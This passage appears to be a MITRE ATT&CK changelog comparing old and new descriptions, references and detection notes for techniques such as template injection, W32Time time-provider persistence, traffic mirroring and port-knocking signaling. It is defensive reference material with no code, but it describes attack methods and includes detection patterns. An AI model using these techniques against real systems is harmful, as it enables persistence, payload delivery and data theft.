| Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users. Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018) | Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Austin Clark, @c2defense'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator', 'root', 'SYSTEM'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-27 21:18:48.149000+00:00 | 2022-10-20 18:27:57.587000+00:00 |
| description | Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users. Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018) | Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018) |
| external_references[1]['source_name'] | Microsoft Shutdown Oct 2017 | Talos Nyetya June 2017 |
| external_references[1]['description'] | Microsoft. (2017, October 15). Shutdown. Retrieved October 4, 2019. | Chiu, A. (2016, June 27). New Ransomware Variant "Nyetya" Compromises Systems Worldwide. Retrieved March 26, 2019. |
| external_references[1]['url'] | https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown | https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html |
| external_references[2]['source_name'] | Talos Nyetya June 2017 | alert_TA18_106A |
| external_references[2]['description'] | Chiu, A. (2016, June 27). New Ransomware Variant "Nyetya" Compromises Systems Worldwide. Retrieved March 26, 2019. | CISA. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved February 14, 2022. |
| external_references[2]['url'] | https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html | https://www.cisa.gov/uscert/ncas/alerts/TA18-106A |
| x_mitre_data_sources[1] | Command: Command Execution | Sensor Health: Host Status |
| x_mitre_data_sources[2] | Sensor Health: Host Status | Command: Command Execution |
| x_mitre_detection | Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006. | Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006. Unexpected or unauthorized commands from network cli on network devices may also be associated with shutdown/reboot, e.g. the reload command. |
| x_mitre_version | 1.0 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Microsoft Shutdown Oct 2017', 'description': 'Microsoft. (2017, October 15). Shutdown. Retrieved October 4, 2019.', 'url': 'https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown'} | |
| x_mitre_platforms | Network |
| Old Description | New Description |
|---|---|
| Adversaries may create or modify references in Office document templates to conceal malicious code or force authentication attempts. Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered. (Citation: Microsoft Open XML July 2017) Properties within parts may reference shared public resources accessed via online URLs. For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded. Adversaries may abuse this technology to initially conceal malicious code to be executed via documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. (Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. (Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit. (Citation: MalwareBytes Template Injection OCT 2017) This technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt. (Citation: Anomali Template Injection MAR 2018) (Citation: Talos Template Injection July 2017) (Citation: ryhanson phishery SEPT 2016) | Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
Properties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.
Adversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded.(Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched.(Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.(Citation: MalwareBytes Template Injection OCT 2017)
Adversaries may also modify the *\template control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.(Citation: Proofpoint RTF Injection)(Citation: Ciberseguridad Decoding malicious RTF files)
This technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.(Citation: Anomali Template Injection MAR 2018)(Citation: Talos Template Injection July 2017)(Citation: ryhanson phishery SEPT 2016) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-04-29 14:37:59.462000+00:00 | 2022-01-12 18:16:56.176000+00:00 |
| description | Adversaries may create or modify references in Office document templates to conceal malicious code or force authentication attempts. Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered. (Citation: Microsoft Open XML July 2017) Properties within parts may reference shared public resources accessed via online URLs. For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded. Adversaries may abuse this technology to initially conceal malicious code to be executed via documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. (Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. (Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit. (Citation: MalwareBytes Template Injection OCT 2017) This technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt. (Citation: Anomali Template Injection MAR 2018) (Citation: Talos Template Injection July 2017) (Citation: ryhanson phishery SEPT 2016) | Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
Properties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.
Adversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded.(Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched.(Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.(Citation: MalwareBytes Template Injection OCT 2017)
Adversaries may also modify the *\template control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.(Citation: Proofpoint RTF Injection)(Citation: Ciberseguridad Decoding malicious RTF files)
This technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.(Citation: Anomali Template Injection MAR 2018)(Citation: Talos Template Injection July 2017)(Citation: ryhanson phishery SEPT 2016) |
| external_references[5]['source_name'] | Anomali Template Injection MAR 2018 | Proofpoint RTF Injection |
| external_references[5]['description'] | Intel_Acquisition_Team. (2018, March 1). Credential Harvesting and Malicious File Delivery using Microsoft Office Template Injection. Retrieved July 20, 2018. | Raggi, M. (2021, December 1). Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors . Retrieved December 9, 2021. |
| external_references[5]['url'] | https://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-template-injection/2104 | https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-technique-poised-widespread |
| external_references[6]['source_name'] | Talos Template Injection July 2017 | Ciberseguridad Decoding malicious RTF files |
| external_references[6]['description'] | Baird, S. et al.. (2017, July 7). Attack on Critical Infrastructure Leverages Template Injection. Retrieved July 21, 2018. | Pedrero, R.. (2021, July). Decoding malicious RTF files. Retrieved November 16, 2021. |
| external_references[6]['url'] | https://blog.talosintelligence.com/2017/07/template-injection.html | https://ciberseguridad.blog/decodificando-ficheros-rtf-maliciosos/ |
| external_references[7]['source_name'] | ryhanson phishery SEPT 2016 | Anomali Template Injection MAR 2018 |
| external_references[7]['description'] | Hanson, R. (2016, September 24). phishery. Retrieved July 21, 2018. | Intel_Acquisition_Team. (2018, March 1). Credential Harvesting and Malicious File Delivery using Microsoft Office Template Injection. Retrieved July 20, 2018. |
| external_references[7]['url'] | https://github.com/ryhanson/phishery | https://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-template-injection/2104 |
| x_mitre_data_sources[1] | Network Traffic: Network Connection Creation | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[2] | Network Traffic: Network Traffic Content | Network Traffic: Network Connection Creation |
| x_mitre_detection | Analyze process behavior to determine if an Office application is performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)), or other suspicious actions that could relate to post-compromise behavior. | Analyze process behavior to determine if user document applications (such as Office) are performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)), or other suspicious actions that could relate to post-compromise behavior.
Monitor .rtf files for strings indicating the *\template control word has been modified to retrieve a URL resource, such as *\template http or *\template \u-. |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Talos Template Injection July 2017', 'description': 'Baird, S. et al.. (2017, July 7). Attack on Critical Infrastructure Leverages Template Injection. Retrieved July 21, 2018.', 'url': 'https://blog.talosintelligence.com/2017/07/template-injection.html'} | |
| external_references | {'source_name': 'ryhanson phishery SEPT 2016', 'description': 'Hanson, R. (2016, September 24). phishery. Retrieved July 21, 2018.', 'url': 'https://github.com/ryhanson/phishery'} | |
| x_mitre_contributors | Michael Raggi @aRtAGGI |
| Old Description | New Description |
|---|---|
Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider) Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider) Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017) |
Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.(Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.(Citation: Microsoft TimeProvider)
Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\.(Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.(Citation: Microsoft TimeProvider)
Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.(Citation: Github W32Time Oct 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-25 15:24:26.476000+00:00 | 2022-04-20 16:31:16.715000+00:00 |
| description | Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider)
Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider)
Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017) |
Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.(Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.(Citation: Microsoft TimeProvider)
Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\.(Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.(Citation: Microsoft TimeProvider)
Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.(Citation: Github W32Time Oct 2017) |
| external_references[1]['source_name'] | Microsoft W32Time Feb 2018 | Github W32Time Oct 2017 |
| external_references[1]['description'] | Microsoft. (2018, February 1). Windows Time Service (W32Time). Retrieved March 26, 2018. | Lundgren, S. (2017, October 28). w32time. Retrieved March 26, 2018. |
| external_references[1]['url'] | https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top | https://github.com/scottlundgren/w32time |
| external_references[2]['source_name'] | Microsoft TimeProvider | Microsoft W32Time May 2017 |
| external_references[2]['description'] | Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018. | Mathers, B. (2017, May 31). Windows Time Service Tools and Settings. Retrieved March 26, 2018. |
| external_references[2]['url'] | https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx | https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings |
| external_references[3]['source_name'] | Github W32Time Oct 2017 | Microsoft W32Time Feb 2018 |
| external_references[3]['description'] | Lundgren, S. (2017, October 28). w32time. Retrieved March 26, 2018. | Microsoft. (2018, February 1). Windows Time Service (W32Time). Retrieved March 26, 2018. |
| external_references[3]['url'] | https://github.com/scottlundgren/w32time | https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top |
| external_references[4]['source_name'] | Microsoft W32Time May 2017 | Microsoft TimeProvider |
| external_references[4]['description'] | Mathers, B. (2017, May 31). Windows Time Service Tools and Settings. Retrieved March 26, 2018. | Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018. |
| external_references[4]['url'] | https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings | https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx |
| x_mitre_detection | Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)
The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns) |
Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility.(Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk.(Citation: Github W32Time Oct 2017)
The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers.(Citation: TechNet Autoruns) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation |
| Old Description | New Description |
|---|---|
| Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure. Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Traffic Mirroring) Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary. | Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure. Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring) Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Cisco. (n.d.). Cisco IOS XR Interface and Hardware Component Configuration Guide for the Cisco CRS Router, Release 5.1.x. Retrieved October 19, 2020. | |
| external_references | CAPEC-117 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator'] | |
| external_references | CAPEC-117 | |
| external_references | Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-16 15:23:37.640000+00:00 | 2022-04-18 22:16:51.359000+00:00 |
| description | Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure. Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Traffic Mirroring) Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary. | Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure. Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring) Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary. |
| external_references[1]['source_name'] | capec | Cisco Traffic Mirroring |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/117.html | https://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r5-1/interfaces/configuration/guide/hc51xcrsbook/hc51span.html |
| external_references[2]['source_name'] | Cisco Traffic Mirroring | Juniper Traffic Mirroring |
| external_references[2]['description'] | Cisco. (n.d.). Cisco IOS XR Interface and Hardware Component Configuration Guide for the Cisco CRS Router, Release 5.1.x. Retrieved October 19, 2020. | Juniper. (n.d.). Understanding Port Mirroring on EX2200, EX3200, EX3300, EX4200, EX4500, EX4550, EX6200, and EX8200 Series Switches. Retrieved October 19, 2020. |
| external_references[2]['url'] | https://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r5-1/interfaces/configuration/guide/hc51xcrsbook/hc51span.html | https://www.juniper.net/documentation/en_US/junos/topics/concept/port-mirroring-ex-series.html |
| external_references[3]['source_name'] | Juniper Traffic Mirroring | Cisco Blog Legacy Device Attacks |
| external_references[3]['description'] | Juniper. (n.d.). Understanding Port Mirroring on EX2200, EX3200, EX3300, EX4200, EX4500, EX4550, EX6200, and EX8200 Series Switches. Retrieved October 19, 2020. | Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. |
| external_references[3]['url'] | https://www.juniper.net/documentation/en_US/junos/topics/concept/port-mirroring-ex-series.html | https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 |
| external_references[5]['source_name'] | Cisco Blog Legacy Device Attacks | capec |
| external_references[5]['url'] | https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 | https://capec.mitre.org/data/definitions/117.html |
| x_mitre_data_sources[0] | Network Traffic: Network Connection Creation | Network Traffic: Network Traffic Flow |
| x_mitre_data_sources[1] | Network Traffic: Network Traffic Flow | Network Traffic: Network Connection Creation |
| Old Description | New Description |
|---|---|
| Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s). The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture. Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL) (Citation: AMD Magic Packet) | Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s). The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities. Adversaries may use crafted packets to attempt to connect to one or more (open or closed) ports, but may also attempt to connect to a router interface, broadcast, and network address IP on the same port in order to achieve their goals and objectives.(Citation: Cisco Synful Knock Evolution)(Citation: Mandiant - Synful Knock)(Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the 